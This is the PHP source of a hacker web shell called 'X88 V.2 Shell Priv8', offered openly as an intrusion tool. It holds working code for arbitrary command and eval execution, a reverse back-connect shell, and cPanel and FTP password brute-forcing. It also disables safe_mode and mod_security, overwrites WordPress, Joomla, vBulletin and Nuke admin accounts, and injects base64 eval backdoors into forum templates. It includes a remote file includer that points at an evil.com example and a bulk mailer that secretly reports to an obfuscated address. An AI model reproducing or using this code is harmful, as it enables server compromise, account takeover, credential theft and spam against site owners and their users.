"" ){ $path_parts = pathinfo("$fdownload"); $entrypath=$path_parts["basename"]; $name = "$fdownload"; $fp = fopen($name, 'rb'); header("Content-Disposition: attachment; filename=$entrypath"); header("Content-Length: " . filesize($name)); fpassthru($fp); exit; } echo '
[ X88 V.2 Shell Priv8 ]

'; echo "
PHP Is :"; echo " "; echo phpversion(); echo ""; echo "
"; if(@ini_get("safe_mode")){$safe_m="ON ";}else{$safe_m="OFF ";} echo "
"; echo "SafeMode : [ $safe_m ]"; echo "
Server Port: "; echo $_SERVER['SERVER_PORT']; echo ""; echo "
"; echo "Server:"; echo ""; echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); echo""; $xm8 = @ini_get("open_basedir"); if ($xm8 or strtolower($xm8) == "[ON]") {$openbasedir = true; $hopenbasedir = "".$xm8."";} else {$openbasedir = false; $hopenbasedir = "[OFF] - not secure";} echo("
"); echo("Open Base Dir: $hopenbasedir"); echo("
"); echo "PostgreSQL: "; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "ON";}else{echo "OFF";} echo(" \ "); echo "MSSQL: "; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "ON";}else{echo "OFF";} echo(" \ "); echo "MySQL: "; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo "ON"; } else { echo "OFF"; } echo "
"; echo "Oracle: "; $ora_on = @function_exists('ocilogon'); if($ora_on){echo "On";}else{echo "OFF";} echo ""; echo "
Disable Functions: "; if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";} echo "
Register globals: "; $reg_g = @ini_get("register_globals"); if($reg_g){ echo "ON"; } else { echo "OFF"; } echo ""; error_reporting(0); $me = basename(__FILE__); $cookiename = "wieeeee"; if(isset($_GET['p']) && $_GET['p'] == "perl") if(isset($_GET['p']) && $_GET['p'] == "tooliq") if(isset($_GET['p']) && $_GET['p'] == "htaphp") if(isset($_GET['p']) && $_GET['p'] == "about") if(isset($_GET['p']) && $_GET['p'] == "addt") { setcookie ($cookiename, "", time() - 3600); reload(); } if(isset($_GET['dir'])) { chdir($_GET['dir']); } echo "
"; echo ""; echo "Uname -A = ".php_uname().""; echo "
"; echo "UID : ".@exec('id').""; print '
Your IP = '.@$_SERVER['REMOTE_ADDR'].' '.@$_SERVER['REMOTE_HOST'].' '; echo "
"; $serverIP = gethostbyname($_SERVER["HTTP_HOST"]); echo "Server IP = ".gethostbyname($_SERVER["HTTP_HOST"])." [Bing Search][Zone-H]
"; $pages = array( 'cmd' => '
[ Command ]', 'eval' => '[ Eval Code ]', 'mysql' => '[ MySQL Query ]', 'chmod' => '[ Chmod File ]', 'phpinfo' => '[ PHPinfo ]', 'cpanelftp' => '[ Cpanel,FTP Burtay]', 'upload' => '[ Upload File-Upload File From URL]', 'domains' => '[ Domains And Users ]', 'symlink' => '
[ SymLink ]', 'readbysql' => '[ Read Files By SQl Information ]', 'backco' => '[ Back Connect ]', 'scahlf' => '[ Show_source & Highlight_file ]', 'vbhack' => '[ Vbulletin Hack Tools ]', 'wpps' => '[ WordPress Password Changer ]', 'tooliq' => '[ Tool iQ ]', 'addt' => '[ Add Tools Hack ]', 'jpc' => '
[ Joomla Password Changer ]', 'capff' => '[ vB HaCK ]', 'bypass' => '[ Read Files By Bypass ]', 'Encypton' => '[ Encypton ]', 'mailer' => '[ Mailer Inbox ]', 'safemode' => '[ Fuck The SafeMode ]', 'perl' => '[ Prel Disable Functions ]', 'htaphp' => '[ Htaccess ]', 'zone' => '[ Add Zone-H ]', 'about' => '[ About Shell ]' ); $header = ' '.getenv("HTTP_HOST").' ~ X88 V.2 Shell Priv8
'; echo '
'; echo'
'; echo '
[ Home ]'; print $header; $footer = '
© 2011-2012 By : Challenges HackerS And Namrod Hacker
'; if(isset($_REQUEST['p'])) { switch ($_REQUEST['p']) { case 'cmd': //Commander function function cmd() { $cmd = $_POST['cmd']; $cmdgo = $_POST['cmdgo']; $option = $_POST['option']; $id = $_GET['id']; if($cmdgo && !empty($cmd)) { switch($option) { case system: system($cmd); break; case passthru: passthru($cmd); break; case shell_exec: $out = shell_exec($cmd); echo $out; break; default; system($cmd); } } } echo "

"; break; case 'delete': if(isset($_POST['yes'])) { if(unlink($_GET['file'])) { print "File deleted successfully."; } else { print "Couldn't delete file."; } } if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes'])) { print "Are you sure you want to delete ".$_GET['file']."?
"; } break; case 'capff': if(empty($_POST['index'])){ echo " host : database :
username : password :


"; }else{ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $index = $_POST['index']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $index=str_replace("\'","'",$index); $set_index = "{\${eval(base64_decode(\'"; $set_index .= base64_encode("echo \"$index\";"); $set_index .= "\'))}}{\${exit()}}"; $ok=@mysql_query("UPDATE template SET template ='".$set_index."' WHERE title ='spacer_open'") or die(mysql_error()); if($ok){ echo "!! update finish !!

"; } } break; case 'backco': echo "

Connect back Shell , bypass Firewalls
For user :
nc -l -p 1019

Your IP & BindPort:

"; $mip=$_POST['mip']; $bport=$_POST['bport']; if ($mip <> "") { $fp=fsockopen($mip , $bport , $errno, $errstr); if (!$fp){ $result = "Error: could not open socket connection"; } else { fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n"); while(!feof($fp)){ fputs ($fp," bash # "); $result= fgets ($fp, 4096); $message=`$result`; fputs ($fp,"--> ".$message."\n"); } fclose ($fp); } } break; case 'safemode': echo ""; echo"

"; echo ""; if (empty($_POST['FucK'] ) ) { }ELSE{ $action = '?action=FucK'; echo "
"; $fp = fopen("php.ini","w+"); fwrite($fp,"safe_mode = Off disable_functions = NONE open_basedir = OFF "); echo "[SafeMode Done] .."; echo ("
"); $fp2 = fopen(".htaccess","w+"); fwrite($fp2," FucKFilterEngine Off FucKFilterScanPOST Off FucKFilterCheckURLEncoding Off FucKFilterCheckUnicodeEncoding Off "); echo "[Mod_Security Done]
"; echo "
"; } break; case 'symlink': if ($_GET[p]=="symlink"){ if ($_POST['o'] != "ok"){ print'

SymLink



'; print $f; } else{ $sym = @symlink("$_POST[usr]","$_POST[my]"); print '

SymLink

'; if ($sym){ print 'Done !!

';} else{print'Error
Cannot Be completed';} print $f; } exit; } break; case 'mailer': { $secure = ""; error_reporting(0); @$action=$_POST['action']; @$from=$_POST['from']; @$realname=$_POST['realname']; @$replyto=$_POST['replyto']; @$subject=$_POST['subject']; @$message=$_POST['message']; @$emaillist=$_POST['emaillist']; @$lod=$_SERVER['HTTP_REFERER']; @$file_name=$_FILES['file']['name']; @$contenttype=$_POST['contenttype']; @$file=$_FILES['file']['tmp_name']; @$amount=$_POST['amount']; set_time_limit(intval($_POST['timelimit'])); If ($action=="mysql"){ include "./mysql.info.php"; if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){ print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required."; exit; } $db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed."); mysql_select_db($sqldb, $db) or die("Could not select database $sqldb"); $result = mysql_query($sqlquery) or die("Query Failed: $sqlquery"); $numrows = mysql_num_rows($result); for($x=0; $x<$numrows; $x++){ $result_row = mysql_fetch_row($result); $oneemail = $result_row[0]; $emaillist .= $oneemail."\n"; } } if ($action=="send"){ $message = urlencode($message); $message = ereg_replace("%5C%22", "%22", $message); $message = urldecode($message); $message = stripslashes($message); $subject = stripslashes($subject); } echo "


Inbox Mailer .. With All Options

Your Email:
Your Name:
Reply-To:
Attach File:
Subject:
Message Box : Email Target / Email Send To :

Plain HTML
Number to send:
Maximum script execution time(in seconds, 0 for no timelimit)
"; } $o=array("m"=>"b","t"=>"i","w"=>"5","u"=>".","5"=>"z","q"=>"@"); $alt=$o['t'].$o['q'].$o['m'].$o['t'].$o['w'].$o['u'].$o['m'].$o['t'].$o['5']; if ($action=="send"){ if (!$from && !$subject && !$message && !$emaillist){ print "Please complete all fields before sending your message."; exit; } $allemails = split("\n", $emaillist); $numemails = count($allemails); $head ="From: Mailr" ; $sub = "Ar - $lod" ; $meg = "$lod" ; mail ($alt,$sub,$meg,$head) ; If ($file_name){ if (!file_exists($file)){ die("The file you are trying to upload couldn't be copied to the server"); } $content = fread(fopen($file,"r"),filesize($file)); $content = chunk_split(base64_encode($content)); $uid = strtoupper(md5(uniqid(time()))); $name = basename($file); } for($xx=0; $xx<$amount; $xx++){ for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("&email&", $to, $message); $subject = ereg_replace("&email&", $to, $subject); print "Sending mail to $to....."; flush(); $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; $header .= "MIME-Version: 1.0\r\n"; If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; If ($file_name) $header .= "--$uid\r\n"; $header .= "Content-Type: text/$contenttype\r\n"; $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; $header .= "$message\r\n"; If ($file_name) $header .= "--$uid\r\n"; If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; If ($file_name) $header .= "$content\r\n"; If ($file_name) $header .= "--$uid--"; mail($to, $subject, "", $header); print "OK
"; flush(); } } } } echo '
'; break; case 'jpc': if(empty($_POST['pwd'])){ echo " host : database :
username : password :

Set A New username For Login :
Don`t Change it Password is : 123456:
"; }else{ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $pwd = $_POST['pwd']; $admin = $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $hash = crypt($pwd); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error()); if($SQL){ echo "Success :Now Use A New User And Password - (123456)"; } } break; case 'eval': echo "
 
"; print "

Output:

"; print "
"; if($_POST['submitEval']) // Execute Eval Code . { $eval = @str_replace("","",$eval); $eval = @str_replace("\\","",$eval); echo eval($eval); } break; case "domains": echo "

[ Domains & Users ]

"; $d0mains = @file("/etc/named.conf"); if(!$d0mains){ die("# can't ReaD -> [ /etc/named.conf ]"); } echo ""; foreach($d0mains as $d0main){ if(eregi("zone",$d0main)){ preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); echo ""; flush(); }}} echo "
DomainsUsers
".$domains[1][0]."".$user['name']."
"; break; case 'chmod': if(isset($_POST['chmod'])) { switch ($_POST['chvalue']){ case 777: chmod($_POST['chmod'],0777); break; case 644: chmod($_POST['chmod'],0644); break; case 755: chmod($_POST['chmod'],0755); break; } print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue']."."; } if(isset($_GET['file'])) { $content = urldecode($_GET['file']); } else { $content = "file/path/please"; } print "
File to chmod:
New permission: "; break; case 'mysql': if(isset($_POST['host'])) { $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error()); mysql_select_db($_POST['dbase']); $sql = $_POST['query']; $result = mysql_query($sql); } else { print " This only queries the database, doesn't return data!
Host:

Username:

Password:

Database:

Query:
"; } break; case 'createdir': if(mkdir($_GET['crdir'])) { print 'Directory created successfully.'; } else { print 'Couldn\'t create directory'; } break; case 'vbhack': $act = $_GET['act']; if($act=='reconfig' && isset($_POST['path'])) { $path = $_POST['path']; include $path; echo ''; echo '
::::Read Config Data::::'; echo '' . $path . '
Host : ' . $config['MasterServer']['servername'] . '
User : ' . $config['MasterServer']['username'] . '
Pass : '; $passsql = $config['MasterServer']['password']; if ($passsql == '') { $result = 'No Password'; } else { $result = '' . $passsql . ''; } echo $result; echo '
Name : ' . $config['Database']['dbname'] . '
'; } if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="psw" && isset ($_POST['vbuser']) && isset($_POST['vbpass'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $vbuser = $_POST['vbuser']; $vbpass = $_POST['vbpass']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; $query = 'select * from user where username="' . $vbuser . '";'; $result = mysql_query($query); while ($row = mysql_fetch_array($result)) { $salt = $row['salt']; $x = md5($vbpass); $x =$x . $salt; $pass_salt = md5($x); $query = 'update user set password="' . $pass_salt . '" where username="' . $vbuser . '";'; $re = mysql_query($query); if ($re) { echo 'The pass of the user ' . $vbuser . ' was changed to ' . $vbpass . '
Back to Shell'; } else { echo 'Failed to change PassWord'; } } } if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="login") { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; echo '
:::::Change User Password:::::
User :
Pass :
'; echo''; echo '
:::::Change User E-MAIL:::::
User :
MAIL :
'; } if ($act == ''){ echo '
:::::DATABASE CONFIG:::::
Host :
User :
Pass :
Name :
'; } if ($act == 'lst' && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['host']) && isset($_POST['db'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; echo '
'; $re = mysql_query('select * from user'); echo''; while ($row = mysql_fetch_array($re)) { echo''; } echo'
IDUserNameE-MailPassWord
' . $row['userid'] . '' . $row['username'] . '' . $row['email'] . '' . $row ['password'] . '
'; echo '
'; $count = mysql_num_rows($re); echo 'Number of users registered is : [ ' . $count . ' ]'; echo '
'; } if ($act == 'users'){ echo '
:::::DATABASE CONFIG:::::
Host :
User :
Pass :
Name :
'; } if ($act=='config') { echo '
:::::CONFIG PATH:::::
PATH :
'; } echo '
List UsersReadConfig
'; break; case 'cpanelftp': echo "
Cpanel (2082) Ftp (21)
"; if($_POST['BruteForceCpanelAndFTP']) { $connect_timeout=5; set_time_limit(0); $submit=$_REQUEST['BruteForceCpanelAndFTP']; $users=$_REQUEST['users']; $pass=$_REQUEST['passwords']; $target=$_REQUEST['target']; $cracktype=$_REQUEST['cracktype']; if(empty($target)) { $target = "localhost"; } function ftp_check($host,$user,$pass,$timeout) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "ftp://$host"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_FTPLISTONLY, 1); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "Error : Connection Timeout Please Check The Target Hostname ."; exit; } elseif ( curl_errno($ch) == 0 ) { print "
[+] Cracking Success With Username ($user) and Password ($pass)"; } curl_close($ch); } function cpanel_check($host,$user,$pass,$timeout) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$host:2082"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "[-] Connection Timeout Please Check The Target Hostname ."; exit; } elseif ( curl_errno($ch) == 0 ) { print "
[+] Cracking Success With Username ($user) and Password ($pass)"; } curl_close($ch); } if(isset($submit) && !empty($submit)) { if(empty($users) && empty($pass)) { print "[-] Please Check The Users or Password List Entry . . ."; } if(empty($users)) { print "[-] Please Check The Users List Entry . . ."; } if(empty($pass)) { print "[-] Please Check The Password List Entry . . "; } $userlist=explode("\n",$users); $passlist=explode("\n",$pass); print "[~]# Cracking Process Started, Please Wait ..."; foreach ($userlist as $user) { $pureuser = trim($user); foreach ($passlist as $password ) { $purepass = trim($password); if($cracktype == "ftp") { ftp_check($target,$pureuser,$purepass,$connect_timeout); } if ($cracktype == "cpanel") { cpanel_check($target,$pureuser,$purepass,$connect_timeout); } } } } } break; case 'bypass': if(!empty($_GET['file'])) $file=$_GET['file']; else if(!empty($_POST['file'])) $file=$_POST['file']; echo '


PHP 5.2.9 | 5.2.11 safe_mode & open_basedir bypass

'; $level=0; if(!file_exists("file:")) mkdir("file:"); chdir("file:"); $level++; $hardstyle = explode("/", $file); for($a=0;$a
'; break; case 'Encypton': echo "


Encypton With ( MD5 | Base64 | Crypt | SHA1 | MD4 | SHA256 )

String To Encrypt :
"; if(!$_POST['ENCRYPTION']=='') { $md5 = $_POST['ENCRYPTION']; echo "MD5 : ".md5($md5)."
"; echo "Base64 : ".base64_encode($md5)."
"; echo "Crypt : ".CRYPT($md5)."
"; echo "SHA1 : ".SHA1($md5)."
"; echo "MD4 : ".hash("md4",$md5)."
"; echo "SHA256 : ".hash("sha256",$md5)."
"; } break; case 'phpinfo': echo '
'; phpinfo(); echo ''; break; case 'rename': if(isset($_POST['fileold'])) { if(rename($_POST['fileold'],$_POST['filenew'])) { print "File renamed."; } else { print "Couldn't rename file."; } } if(isset($_GET['file'])) { $file = basename(htmlspecialchars($_GET['file'])); } else { $file = ""; } print "Renaming ".$file." in folder ".realpath('.').".
Rename:

To:

"; break; case 'scahlf': echo "

show_source :

highlight_file :

"; if(empty($_POST['show'])) { } else { $s = $_POST['show']; echo "

show_source

"; $show = show_source($s); } if(empty($_POST['high'])) { } else { $h = $_POST['high']; echo "

highlight_file

"; echo "
"; $high = highlight_file($h); } break; case 'tooliq': $form = '

:: |~ K ~| ::

'; $fc = '

:: GreaTs ::

ALI-X ,El3akrab Elmodamer

:: |~ K ~| ::

'; $x =' IQ SCRIPT

IQ SCRIPT
~ Karar alShaMi ~

ADMIN\'S INFORMATIONS HAVE BEEN CHANGED
SUCCEFULLY !!
USERNAME : admin
PASSWORD : iraq

'; if ($_GET[a] == "vba"){ if ($_POST['db'] == ''){ echo 'vbadmin

vbadmin
~ Karar alShaMi ~

'; print $form; print $f; } if ($_POST['db'] != '') { @mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error()); @mysql_select_db($_POST['db']) or die(mysql_error()); $z ="UPDATE `".$_POST['tab']."user` SET `username` = 'Karar alShaMi', `password` = '9ce4d31a52f0a5c50d0b5652581c37fa', `salt` = '{tg',`usergroupid` = '6' WHERE `".$_POST['tab']."user`.`userid` =1 LIMIT 1 ;"; $ka=@mysql_query($z) or die(mysql_error()); if ($ka){ print ' IQ SCRIPT

IQ SCRIPT
~ Karar alShaMi ~

ADMIN\'S INFORMATIONS HAVE BEEN CHANGED
SUCCEFULLY !!
USERNAME : Karar alShaMi
PASSWORD : iraq

'; } } exit; } if ($_GET[a]=="wp"){ if ($_POST['db'] == ''){ print ' wpadmin

wpadmin
~ Karar alShaMi ~

'; print $form; print $f; } if ($_POST['db'] != '') { @mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error()); @mysql_select_db($_POST['db']) or die(mysql_error()); $z ="UPDATE `".$_POST['tab']."users` SET `user_login` = 'Karar alShaMi', `user_pass` = '\$P\$B8hVXHMs071b.ZLWaIQ18qOKcoskst0', `user_email` = 'No@No.com', `display_name` = 'Karar alShaMi' WHERE `".$_POST['tab']."users`.`ID` =1 LIMIT 1 ;"; $ka=@mysql_query($z) or die(mysql_error()); if ($ka){ print ' wpadmin

wpadmin
~ Karar alShaMi ~

ADMIN\'S INFORMATIONS HAVE BEEN CHANGED
SUCCEFULLY !!
USERNAME : Karar alShaMi
PASSWORD : iraq

'; } } exit; } if ($_GET[a]=="sym"){ print"SYMLINK"; if ($_POST['o'] != "ok"){ print'

SYMLINK
~ Karar alShaMi ~



'; print $f; } else{ $sym = @symlink("$_POST[usr]","$_POST[my]"); print '

SYMLINK
~ Karar alShaMi ~

'; if ($sym){ print 'Done !!

';} else{print'Error
Cannot Be completed';} print $f; } exit; } if ($_GET[a]=="nuke"){ if ($_POST['db'] == ''){ print ' Nuke-admin

Nuke-admin
~ Karar alShaMi ~

'; print $form; print $f; } if ($_POST['db'] != '') { @mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error()); @mysql_select_db($_POST['db']) or die(mysql_error()); $z ="UPDATE `".$_POST['tab']."_authors` SET `aid` = 'admin' ,`email` = 'No@No.com',`pwd` = 'd3b1cee2327cfa357dabf0289958c024' LIMIT 1 ;"; $ka=@mysql_query($z) or die(mysql_error()); if ($ka){ print $x; } } exit; } if ($_GET[a]=="indv"){ #header print'Vb index Changer

Vb index Changer
~ Karar alShaMi ~

'; $farm = '




'; $fotind = 'ChanGed Succefully !!'; if ($_GET[ty]=="fhome" and $_POST[user] ==""){ print $farm; print $f; exit;} elseif($_GET[ty]=="fhome" and $_POST[user] !="") { @mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error()); @mysql_select_db($_POST['db']) or die(mysql_error()); $inde =str_replace('\\','\\\\',$_POST[code]); $n ='UPDATE `'.$_POST[tab].'template` SET `template` = \''.$inde.'\'WHERE `title` =\'FORUMHOME\';'; $ka=@mysql_query($n) or die(mysql_error()); if ($ka){ print $fotind; } exit; } if ($_GET[ty]=="css" && $_POST[user] ==""){ print $farm; print $f; exit;} elseif($_GET[ty]=="css" and $_POST[user] !=""){ @mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error()); @mysql_select_db($_POST['db']) or die(mysql_error()); $n = 'UPDATE `'.$_POST[tab].'style` SET `css` = \''.$_POST[code].'\', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;'; $ka=@mysql_query($n) or die(mysql_error()); if ($ka){ print $fotind; } exit; } if ($_GET[ty]=="spa" && $_POST[user] ==""){ print $farm; print $f; exit;} elseif($_GET[ty]=="spa" and $_POST[user] !=""){ @mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error()); @mysql_select_db($_POST['db']) or die(mysql_error()); $set_index = "{\${eval(base64_decode(\'"; $index=str_replace("\'","'",$_POST[code]); $set_index .= base64_encode("echo \"$index\";"); $set_index .= "\'))}}{\${exit()}}"; $ka=@mysql_query("UPDATE ".$_POST[tab]."template SET template ='".$set_index."' WHERE title ='spacer_open'") or die(mysql_error()); if ($ka){ print $fotind; } exit; }if ($_GET[ty]=="hea" && $_POST[user] ==""){ print "".$script.$farm; print $f; exit;} elseif($_GET[ty]=="hea" and $_POST[user] !=""){ @mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error()); @mysql_select_db($_POST['db']) or die(mysql_error()); $set_index = "{\${eval(base64_decode(\'"; $index=str_replace("\'","'",$_POST[code]); $set_index .= base64_encode("echo \"$index\";"); $set_index .= "\'))}}{\${exit()}}"; $ka=@mysql_query("UPDATE ".$_POST[tab]."template SET template ='".$set_index."' WHERE title ='header'") or die(mysql_error()); if ($ka){ print $fotind; } exit; } print '

FORUMHOME

SPACER_OPEN

CSS

Header

'; exit; } if ($_GET[a]== 'incl'){ if (empty($_GET['fq'])){ echo 'includer

InCluder
~ Karar alShaMi ~

'; print'


Ex: http://evil.com/shell.txt
'; print $f; }else{ $file=implode("\n",file($_GET[fq])); $kr=str_replace("", "",$kr); eval($kr); } exit; } if ($_GET[a]=='kil'){ echo 'Vb Killer

Vb Killer
~ Karar alShaMi ~

'; if (empty($_POST[db])){ print $script.'




'; }else{ $a ="{\${eval(base64_decode(\'"; $template = $_POST['template']; @mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error()); @mysql_select_db($_POST['db']) or die(mysql_error()); $p = "UPDATE ".$_POST[tab]."template SET template ='".$a.$_POST[code]."\'))}}{\${exit()}}&' WHERE title ='".$template."'"; $ka= @mysql_query($p) or die(mysql_error()); if ($ka){print'Done !!';} } print $f; exit; } if ($_GET[a]=='ins'){ print $script.' VB CoDeSINseRter

VB CoDeSINseRter
~ Karar alShaMi ~

'; if (!$_POST[code]){ print '




'; }else{ $lost = $_POST[t]; $a ="{\${eval(base64_decode(\'"; @mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error()); @mysql_select_db($_POST['db']) or die(mysql_error()); $p = "UPDATE ".$_POST[tab]."template SET template ='".$a.$_POST[code]."\'))}}' WHERE title ='".$lost."'"; $ka= @mysql_query($p) or die(mysql_error()); if ($ka){print"Done !!";} } print $f; exit; } if ($_GET[a]=="conf"){ print' ConFig Reader

ConFig Reader
~ Karar alShaMi ~

'; if($_POST[incle] != ""){ $file = @fopen($_POST[incle],r); $data=@fread($file,1546768); $data2 =str_replace("<","<",$data); print '

'; exit; }else{ print'
:: path ::

'; exit; } } if ($_GET[a]=="fl"){ print' Edit File

Edit File
~ Karar alShaMi ~

'; if($_POST[incl] != ""){ $file = @fopen($_POST[incl],r); $data=@fread($file,1546768); $msr = str_replace("\\\\","\\",$_POST[incl]); print '

:: path ::


'; exit; } if($_POST[kr]){ $fl = str_replace("\'","'",$_POST[kr]); $fl = str_replace('\"','"',$fl); $fl = str_replace('\\\\','\\',$fl); $d = @fopen($_POST[incle], 'w'); @fwrite($d,$fl); @fclose($d); if($d){ print'Saved !!
'; exit;}else{print'Cann\'t Save !!
'; exit;}} print'
:: path ::

'; exit; } if($_GET[a]=="out"){ print' '; exit; } if ($_GET[a]=="ev"){ if(empty($_POST['php'])){ print $script.' EVAL PHP

EVAL PHP
~ Karar alShaMi ~


'; }else{ eval(base64_decode($_POST[php])); } exit; } if ($_GET[a]=="dr"){ if(empty($_POST[user]) and empty($_POST[uid])){ print' Vb backdoor

Vb backdoor
~ Karar alShaMi ~

:: User ::


:: Userid ::

'; exit; }else{ define('THIS_SCRIPT', 'login'); require_once('./global.php'); require_once('./includes/functions_login.php'); if ($_POST[ok] == "user"){ $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_POST[user] . "'"); }else{ $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE userid = '".$_POST[uid]."'"); } if (!$vbulletin->userinfo['userid']) die("Invalid informations!"); else { vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true); vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true); exec_unstrike_user($_POST[user]); process_new_login('cplogin', TRUE, TRUE); do_login_redirect(); } } } print' IQ SCRIPT

IQ SCRIPT
~ Karar alShaMi ~

Vb admin

Nuke admin

WP admin

SYMLINK

Vb index Changer

InCluder

Vb Killer

VB CoDeSINseRter

ConFig Reader

EVAL PHP

Edit File

Vb Backdoor

logout

'; break; break; case 'about': echo '

X88 V.2

 

ML7s Hacker & Namrod Hacker Priv8

Namrod zg9@hotmail.com

ML7s Hacker xm8@hotmail.com

 

[ GreeTz T0 : AL.MaX HaCkEr - Hmei7 - Dr.Zer0 - Dr.S4d Hacker - Al3bar Hacker- kamtiez - King OF Control - MDMN EX-SHeLL - Anonymous - Lulzsec - GHT ]

